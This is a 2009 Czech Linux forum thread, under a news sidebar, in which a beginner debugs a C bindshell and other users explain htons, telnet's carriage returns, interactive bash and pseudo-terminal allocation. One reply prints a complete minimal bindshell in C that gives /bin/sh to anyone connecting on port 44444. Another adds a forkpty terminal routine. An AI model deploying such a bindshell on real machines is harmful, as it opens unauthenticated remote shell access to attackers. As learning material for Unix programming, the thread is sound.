abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
dnes 02:48 | Komunita

Greg Kroah-Hartman potvrdil, že Linux 4.9 je jádrem s prodlouženou upstream podporou (LTS, Long Term Support). Podpora je plánována do ledna 2019. Aktuální jádra s prodlouženou podporou jsou tedy 3.2, 3.4, 3.10, 3.12, 3.16, 3.18, 4.1, 4.4 a 4.9.

Ladislav Hagara | Komentářů: 0
dnes 00:11 | Zajímavý článek

Výrobce síťových prvků, společnost Netgear, spustila nový program, který slibuje vývojářům, expertům, ale i běžným uživatelům vyplacení finanční odměny za nalezení bezpečnostních chyby v jejich produktech. Za nalezení zranitelnosti v hardware, API nebo mobilní aplikaci nabízí odměnu od 150 do 15 tisíc dolarů (dle závažnosti).

Michal Makovec | Komentářů: 0
dnes 00:08 | Pozvánky

V sobotu 18. 2. se v Praze v prostorách VŠE uskuteční od 9:30 již 4. ročník největší české konference o open source redakčním systému WordPress (WP) - WordCamp Praha 2017.

… více »
smíťa | Komentářů: 0
včera 23:58 | Komunita

Kryptoměnová komunita zahájila nový rok spuštěním projektu Blockchain.cz, jehož cílem je kolektivně nalézt ideální překlad pro čím dál frekventovanější slovo „blockchain“. Přispět návrhem může kdokoli. Sběr bude trvat až do konce září 2017. Následně bude probíhat dvoutýdenní veřejné hlasování, které bude zakončeno výběrem toho nejlepšího návrhu.

xHire | Komentářů: 3
včera 15:55 | Bezpečnostní upozornění

Společnost Oracle vydala čtvrtletní bezpečnostní aktualizaci svých softwarových produktů (CPU, Critical Patch Update). Opraveno je celkově 270 bezpečnostních chyb. V Oracle Java SE je například opraveno 17 bezpečnostních chyb. Vzdáleně zneužitelných bez autentizace je 16 z nich. V Oracle MySQL je opraveno 27 bezpečnostních chyb. Vzdáleně zneužitelných bez autentizace je 5 z nich.

Ladislav Hagara | Komentářů: 0
včera 02:48 | Nová verze

Po půl roce od vydání verze 9.0 (zprávička) byla vydána verze 10.0 zvukového serveru PulseAudio. Přehled novinek v poznámkách k vydání.

Ladislav Hagara | Komentářů: 26
včera 00:33 | Komunita Ladislav Hagara | Komentářů: 8
18.1. 17:30 | Zajímavý článek

Mozilla.cz informuje, že webový prohlížeč Firefox bude od verze 53 obsahovat integrovaný prohlížeč dat ve formátu JSON. Firefox kromě strukturovaného prohlížení nabídne také možnost filtrace a uložení na disk. Dle plánu by měl Firefox 53 vyjít 18. 4. 2017.

Ladislav Hagara | Komentářů: 1
18.1. 11:00 | Komunita

Členové a příznivci spolku OpenAlt se pravidelně schází v Praze a Brně. Fotky z pražských srazů za uplynulý rok si můžete prohlédnout na stránkách spolku. Příští sraz se koná už zítra 19. ledna – tentokrát je tématem ergonomie ovládání počítače – tzn. klávesnice, myši a další zařízení. Také budete mít příležitost si prohlédnout pražský hackerspace Brmlab.

xkucf03 | Komentářů: 1
17.1. 21:55 | Komunita

Nadace pro svobodný software (FSF) oznámila aktualizaci seznamu prioritních oblastí (changelog), na které by se měli vývojáři a příznivci svobodného softwaru zaměřit. Jsou to například svobodný operační systém pro chytré telefony, hlasová a video komunikace nebo softwarový inteligentní osobní asistent.

Ladislav Hagara | Komentářů: 20
Jak se stavíte k trendu ztenčování přenosných zařízení (smartphony, notebooky)?
 (10%)
 (2%)
 (74%)
 (3%)
 (11%)
Celkem 332 hlasů
 Komentářů: 24, poslední 17.1. 10:14
    Rozcestník
    Reklama

    Dotaz: bindshell v C

    7.2.2009 13:06 qadamc03
    bindshell v C
    Přečteno: 632×

    Dobry den,

    mam takovyto jednoduchy bindshell napsany v C:

    www.qg.ic.cz/a/bindshell.c

    Podle me by mel po spusteni fungovat tak, ze bude cekat na portu 44444 a po pripojeni (treba pres telnet) mi preda shell. Narazil jsem vsak na dva problemy:

    Spustim program

    $ ./bindshell

    Pokusim se pripojit na port 44444:

    $ telnet localhost 44444
    Trying 127.0.0.1...
    telnet: Unable to connect to remote host: Connection refused
    

    Program neposloucha na portu 44444, divne, podivam se tedy pres nmap, kde ve skutecnosti visi:

    $ sudo nmap -sS -p1-65000 localhost
    
    Starting Nmap 4.76 ( http://nmap.org ) at 2009-02-07 13:03 CET
    Interesting ports on localhost.localdomain (127.0.0.1):
    Not shown: 64997 closed ports
    PORT      STATE SERVICE
    40109/tcp open  unknown
    
    Nmap done: 1 IP address (1 host up) scanned in 4.83 seconds
    

    Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:

    $ telnet localhost 40109
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    ls
    : command not found
    id
    : command not found
    

    Nemam shell, pouze "visim" v konzoli. Proc? V sitovem programovani jsem zacatecnik, muze mi prosim nekdo tyto dva jevy objasnit? Budu moc vdecny.

    Odpovědi

    7.2.2009 14:09 Vojtěch Horký | skóre: 39 | blog: Vojtův zápisník | Praha
    Rozbalit Rozbalit vše Re: bindshell v C
    Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:

    man htons

    Nemam shell, pouze "visim" v konzoli. Proc?

    Tipuju, že shell nedostal proměnné prostředí (posl. parametr execve) - především $PATH a tudíž netuší, kde má hledat binárky.

    BTW - argv[0] není cesta, ale pouze basename (tj. spouštět stylem execve("/bin/sh", {"sh", NULL}, environ)).

    I am always ready to learn although I do not always like to be taught. (W. Churchill)
    7.2.2009 15:43 qadamc03
    Rozbalit Rozbalit vše Re: bindshell v C

    Na htons jsem uplne zapomnel, dekuji. Porty se uz prirazuji korektne. Program jsem tedy upravil takto:

    www.qg.ic.cz/a/bindshell.c

    Ale problem s "command not found" stale pretrvava:/
     

    7.2.2009 16:08 Vojtěch Horký | skóre: 39 | blog: Vojtův zápisník | Praha
    Rozbalit Rozbalit vše Re: bindshell v C
    Ale problem s "command not found" stale pretrvava:/

    Pokud se přidá parametr -i pro interaktivní shell, tak mi to běhá (ale dost dobře nechápu proč to bez toho nefunguje a proč si myslí, že argv[0] je '').

    I am always ready to learn although I do not always like to be taught. (W. Churchill)
    7.2.2009 18:20 pht | skóre: 48 | blog: pht
    Rozbalit Rozbalit vše Re: bindshell v C
    Tak sem hoďte zdroják. Jinak tohle je dost obvyklý problém -- má to nějaký jednoduchý důvod, ale teď si nemůžu vzpomenout proč to tak dělá. Lze to dohledat. (Tuším že se to dalo obejít středníkem, zkuste zadat "ls;".) I když to vyřešíte, tak dostanete jen dost primitivní shell. Zkuste to přes alokaci pty, tam dostanete něco použitelného.
    In Ada the typical infinite loop would normally be terminated by detonation.
    8.2.2009 08:22 luky
    Rozbalit Rozbalit vše Re: bindshell v C
    1. cislo portu prohnat funkci htons().
    2. pokud shell neni interaktivni, tak nevypisuje prompt. mozno vynutit parametrem -i.
    3. telnet do radku pridava \r. muzete prikazy zadavat se strednikem (takze to smeti bude az za nim), nebo se pripojovat treba netcatem, nebo to programove osetrit.
    8.2.2009 08:56 luky
    Rozbalit Rozbalit vše Re: bindshell v C
    A to \r taky zpusobuje iluzi prazdneho jmena tim, ze presouva kurzor na zacatek radku a dalsi vypisovany text prepisuje ten puvodni. Pri pouziti delsiho jmena to je hezky videt.

    Kdyz do argv[0] dam "ABCDEFGHIJKLMNOPQRSTUVWXYZ" a zadam prikaz "id", ktery telnet posle jako "id\r", tak shell v mem pripade vypisuje chybu:

    ABCDEFGHIJKLMNOPQRSTUVWXYZ: line 1: id\r: command not found\n

    kterou vidim jako:

    : command not foundTUVWXYZ: line 1: id
    8.2.2009 12:39 qadamc03
    Rozbalit Rozbalit vše Re: bindshell v C

    Dekuji, pomohlo to, program jsem tedy upravil, ted uz ma jen jednu mouchu:

    $ nc localhost 44444
    sh: no job control in this shell
    sh-3.2$

    Jak se prosim zbavim te hlasky "no job control in this shell"

    8.2.2009 13:05 qadamc03
    Rozbalit Rozbalit vše Re: bindshell v C

    Tak jsem si vsiml, ze tu hlasku to vypisuje pouze pokud bash volam takto:

    execle("/bin/bash", "/bin/bash", "-i", NULL, envp);

    Pokud ho zavolam takto (bez parametru -i):

    execle("/bin/bash", "/bin/bash", NULL, envp);

    je to OK. Ja bych tam ten prompt ale potreboval, nenapada vas jak toho dosahnout?

    8.2.2009 19:21 pht | skóre: 48 | blog: pht
    Rozbalit Rozbalit vše Re: bindshell v C
    Tak znova.

    Pokud to spustíte bez -i, tak se k Vám bash chová jako byste byl skript, tj. nenabízí vám prompt (mimo jiné).

    Pokud ho spustíte s -i, řeknete mu že chcete "interaktivní režim". Tj. prompt se zobrazí. Proč Vám tedy nenabídne job control? Protože nemáte alokovaný terminál, místo toho je bash pouze napojen na síťový socket. Jelikož je v interaktivním režimu běžné mít job control, tak Vás na tuto anomálii upozorní. Další věci které nefungují bez pořádného terminálu jsou například ctrl-c, ctrl-z.

    In Ada the typical infinite loop would normally be terminated by detonation.
    10.2.2009 14:43 qadamc03
    Rozbalit Rozbalit vše Re: bindshell v C

    A je nejaka moznost jak mu ten terminal alokovat i kdyz pouzivam interaktivni rezim? Jednoduse zabranit vypisu te hlasky - nevypada to tam pekne.

    10.2.2009 15:19 Messa | skóre: 39 | blog: Messa
    Rozbalit Rozbalit vše Re: bindshell v C

    man 7 pty

    man posix_openpt

    10.2.2009 16:56 qadamc03
    Rozbalit Rozbalit vše Re: bindshell v C

    A jakym zpusobem to zapomponovat do toho programu? Ta funkce vraci file describtor a ten pak presmeruju do toho socketu stejne jako to delam se stdin, stdout a stderr?

    10.2.2009 17:22 Messa | skóre: 39 | blog: Messa
    Rozbalit Rozbalit vše Re: bindshell v C

    Ano, a bash připojíte na slave.

    10.2.2009 22:29 qadamc03
    Rozbalit Rozbalit vše Re: bindshell v C

    Jaky slave?

     

    10.2.2009 23:34 luky
    Rozbalit Rozbalit vše Re: bindshell v C
    Pro ten terminál budete mít dva deskriptory - master a slave. Všechno je to popsáno v těch odkazovaných manuálových stránkách.
    11.2.2009 11:05 qadamc03
    Rozbalit Rozbalit vše Re: bindshell v C

    Omlouvam se, asi jsem slepy, ale tady:

    man posix_openpt

    v sekci return value, je ze ta funkce vraci "a non-negative file descriptor which is the lowest numbered unused descriptor", coz je jeden fd. Kde tedy sezenu ten druhy?

    11.2.2009 12:49 Sinuhet | skóre: 31
    Rozbalit Rozbalit vše Re: bindshell v C
    $ man pts
       ...
    
       Unix 98 pseudo-terminals
           An unused Unix 98 pseudo-terminal master is opened by calling posix_openpt(3).  (This function opens the  mas‐
           ter clone device, /dev/ptmx; see pts(4).)  After performing any program-specific initializations, changing the
           ownership and permissions of the slave device using grantpt(3), and unlocking the  slave  using  unlockpt(3)),
           the  corresponding slave device can be opened by passing the name returned by ptsname(3) in a call to open(2).
    
       ...
    11.2.2009 14:52 qadamc03
    Rozbalit Rozbalit vše Re: bindshell v C

    Tak ja uz se v tom teda nejak nevyznam:-/ Muze mi prosim nejaka dobra duse poradit tak vse vyse zminene naroubuji do tohoto kodu?

    ...
    // redirect
    dup2(sock2, 0);
    dup2(sock2, 1);
    // execute
    execle("/bin/bash", "/bash", "-i", NULL, envp);
    
    12.2.2009 13:29 luky
    Rozbalit Rozbalit vše Re: bindshell v C

    Zhruba jde o to, že až otevřete ten terminál, tak vytvoříte nový proces, ve kterém na slave toho terminálu píchnete ten shell a v původním procesu budete přesypávat data z masteru do socketu a zpátky. Není to nic složitého, ale psát to za vás nikdo nebude. Na internetu se válí spousta dokumentace a kódu pro inspiraci.

    man fork, wait, select, write/read(/send/recv), ...

    Pak se taky možná dostanete k signálům pro kontrolu terminálu/procesu a jejich předávání z klienta a buď se na to vykašlete, nebo budete o kus chytřejší :)

    11.2.2009 14:04 pht | skóre: 48 | blog: pht
    Rozbalit Rozbalit vše Re: bindshell v C
    Já jsem to měl takhle nějak, za použití neposixího forkpty, tak se můžete inspirovat. Případne můžou pánové šťouralové vylepšit.
    static void run_terminal(int socket)
    {
            pid_t p, pp;
            int m;
            struct winsize ws = { .ws_row = 25, .ws_col = 80,
                    .ws_xpixel = 0,  .ws_ypixel = 0 };
    
            p = forkpty(&m, NULL, NULL, &ws);
            if (p < 0) {
                    error("forkpty");
                    close(socket);
                    close(m);
                    return;
            }
    
            if (p > 0) {
                    pp = fork();
                    if (pp < 0) {
                            error("fork");
                            close(socket);
                            close(m);
                            return;
                    }
                    if (pp > 0) {
                            close(socket);
                            close(m);
                            return;
                    }
                    close(listen_socket);
                    say("entering copy loop");
                    copy_loop(m, m, socket, socket);
                    say("copy loop finished");
                    kill(p, 1);
                    exit(0);
            } else {
                    close(listen_socket);
                    close(socket);
                    close(m);
                    say("spawning shell");
                    execl("/bin/bash", "bash", "-i", "-l", NULL);
                    bail("execl");
            }
    }
    
    
    In Ada the typical infinite loop would normally be terminated by detonation.
    11.2.2009 15:29 Messa | skóre: 39 | blog: Messa
    Rozbalit Rozbalit vše Re: bindshell v C

    Skoro mě napadá otázka, na jaké škole se dávají takovéhle úkoly? :-)

    11.2.2009 19:07 pht | skóre: 48 | blog: pht
    Rozbalit Rozbalit vše Re: bindshell v C
    Bojím se, že u nás asi na nijaké, přitom to je celkem standardní příklad na programování v unixu a na bezpečnost jakbysmet.
    In Ada the typical infinite loop would normally be terminated by detonation.
    8.2.2009 19:22 pht | skóre: 48 | blog: pht
    Rozbalit Rozbalit vše Re: bindshell v C
    3. telnet do radku pridava \r.
    Jo, to je ten jednoduchý důvod :-)
    In Ada the typical infinite loop would normally be terminated by detonation.
    murzim avatar 8.2.2009 19:32 murzim | skóre: 12 | blog: murzim
    Rozbalit Rozbalit vše Re: bindshell v C

    Ahoj ja pouzivam tento kod - je kratsi a ve vysledku i uspornejsi jako shellkod:

    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    int soc,cli;
    struct sockaddr_in serv_addr;

    int main(){
        serv_addr.sin_family=2;
        serv_addr.sin_addr.s_addr=0;
        serv_addr.sin_port=0x9CAD;   // Toto je to tvoje cislo portu 44444 zapsane v hex a prevracene - cili klasicky --> 0xAD9C ---> AD|9C --> 0x9CAD
        soc=socket(2,1,0);
        bind(soc,(struct sockaddr *)&serv_addr,0x10);
        listen(soc,1);
        cli=accept(soc,0,0);
        dup2(cli,0);
        dup2(cli,1);
        dup2(cli,2);
        execve("/bin/sh",0,0);
    }

    jinak doporucuji namisto telnet pouzit nc cili:

    nc localhost 44444

     

    Bůh stvořil člověka a opice vznikly evolucí "o pár let později" z blbých lidí.
    8.2.2009 20:09 Vojtěch Horký | skóre: 39 | blog: Vojtův zápisník | Praha
    Rozbalit Rozbalit vše Re: bindshell v C
    Nedá mi to, abych nezareagoval: používat magická čísla (soc=socket(2,1,0); atd.) je cesta do pekel. Ten původní kód je přehlednější a nepřijde mi o tolik delší.
    I am always ready to learn although I do not always like to be taught. (W. Churchill)

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.